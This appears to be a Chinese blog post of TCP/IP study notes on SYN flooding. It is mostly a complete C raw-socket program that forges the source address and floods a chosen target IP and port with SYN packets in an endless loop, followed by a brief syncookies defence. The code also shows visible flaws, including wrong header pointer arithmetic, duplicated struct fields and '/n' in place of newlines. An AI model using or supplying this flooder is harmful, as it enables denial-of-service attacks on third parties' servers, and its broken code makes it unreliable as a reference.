TCP/IP学习--syn flag flooding实作
syn flag flooding:一台机器在网络中通讯时首先需要建立TCP握手,标准的TCP握手需要三次包交换来建立。一台服务器一旦接收到客户机的SYN包后必须回应一个SYN/ACK包,然后等待该客户机回应给它一个ACK包来确认,才真正建立连接。然而,如果只发送初始化的 SYN包,而不发送确认服务器的ACK包会导致服务器一直等待ACK包。由于服务器在有限的时间内只能响应有限数量的连接,这就会导致服务器一直等待回应 而无法响应其他机器进行的连接请求。
#include <unistd.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#define URG 32
#define ACK 16
#define PSH 8
#define RST 4
#define SYN 2
#define FIN 1
struct ipheader {
unsigned char iph_ihl:5,
iph_ver:4;
unsigned char iph_tos;
unsigned short int iph_len;
unsigned short int iph_ident;
unsigned char iph_flags;
unsigned short int iph_offset;
unsigned char iph_ttl;
unsigned char iph_protocol;
unsigned short int iph_chksum;
unsigned int iph_sourceip;
unsigned int iph_destip;
};
struct tcpheader {
unsigned short int tcph_srcport;
unsigned short int tcph_destport;
unsigned int tcph_seqnum;
unsigned int tcph_acknum;
unsigned char tcph_reserved:4,
tcph_offset:4;
unsigned int tcp_res1:4,
tcph_hlen:4,
tcph_fin:1,
tcph_syn:1,
tcph_rst:1,
tcph_psh:1,
tcph_ack:1,
tcph_urg:1,
tcph_res2:2;
unsigned short int tcph_win;
unsigned short int tcph_chksum;
unsigned short int tcph_urgptr;
};
//check sum function
unsigned short check_sum(unsigned short *buf,int nwords){
unsigned long sum;
for(sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum &0xffff);
sum += (sum >>16);
return (unsigned short)(~sum);
}
int main(int argc,char *argv[]) {
int s = socket(PF_INET,SOCK_RAW,IPPROTO_TCP);
char datagram[4096];
struct ipheader *iph = (struct ipheader *) datagram;
struct tcpheader *tcph = (struct tcpheader *) datagram + sizeof(struct ipheader);
struct sockaddr_in sin;
if(argc != 3) {
printf("Invalid parameters!/n");
printf("Usage:%s <target ip/hostname> <port to be flooded>/n",argv[0]);
exit(-1);
}
unsigned int floodport = atoi(argv[2]);
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(argv[1]);
memset(datagram,0,4096);
iph->iph_ihl = 5;
iph->iph_ver = 4;
iph->iph_tos = 0;
iph->iph_len = sizeof(struct ipheader) + sizeof(struct tcpheader);
iph->iph_ident = htonl(54321);
iph->iph_offset = 0;
iph->iph_ttl = 255;
iph->iph_protocol = 6;
iph->iph_chksum = 0;
iph->iph_sourceip = inet_addr("127.0.0.1");
iph->iph_destip = sin.sin_addr.s_addr;
tcph->tcph_srcport = htons(5678);
tcph->tcph_destport = htons(floodport);
tcph->tcph_seqnum = random();
tcph->tcph_acknum = 0;
tcph->tcph_res2 = 0;
tcph->tcph_offset = 0;
tcph->tcph_syn = 0x02;
tcph->tcph_chksum = 0;
tcph->tcph_urgptr = 0;
iph->iph_chksum = check_sum((unsigned short *)datagram,iph->iph_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,val,sizeof(tmp)) < 0) {
printf("Error: setsockopt() - cannot set hdrincl!/n");
exit(-1);
} else
printf("ok,using you won header!/n");
while(1) {
if(sendto(s,datagram,iph->iph_len,0,(struct sockaddr *)&sin,sizeof(sin)) < 0)
printf("sendto() error!!!!/n");
else
printf("Flooding %s at %u..../n",argv[1],floodport);
}
return 0;
}
一种新型的防御攻击的方式—— TCP Cookie,TCP Cookie 技术针对 TCP 协议的软肋,做出了一些改进,只需要在系统中开启tcp_syncookies。
1. 在 /etc/rc.d/rc.local中添加
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
2. 编辑/etc/sysctl.conf 文件
net.ipv4.tcp_syncookies = 1
3. 重启系统
- Attacks on TCP/IP Protocols (Task3) SYN Flooding Attack
- 用协议分析工具学习TCP/IP(超赞)
- Eclipse学习系列 -- TCP/IP Monitor
- TCP/IP卷一 学习笔记
- 用协议分析工具学习TCP/IP
- 2015-07学习总结——网络编程(TCP/IP)
- tcp/ip学习
- 重温TCP-IP学习笔记- 2/3
- (原创)TCP/IP学习笔记之IP(网际协议)
- TCP/IP详细学习
- Linux网络编程学习笔记-TCP/IP基础-1
- TCP,UDP,IP 协议学习
- TCP/IP学习 1.4地址解析协议
- 三个源码包libnet、libnids、libpcap学习TCP/IP
- SYN(synchronous)是TCP/IP建立连接时使用的握手信号
- 一个纯小白内心的读白--学习TCP/IP的开始
- TCP-IP学习笔记(四)——概述
- TCP/IP网络编程 学习笔记_8 --优雅地断开套接字连接
- 实验一、用抓包工具学习TCP/IP
- OSI七层协议模型、TCP/IP四层模型学习笔记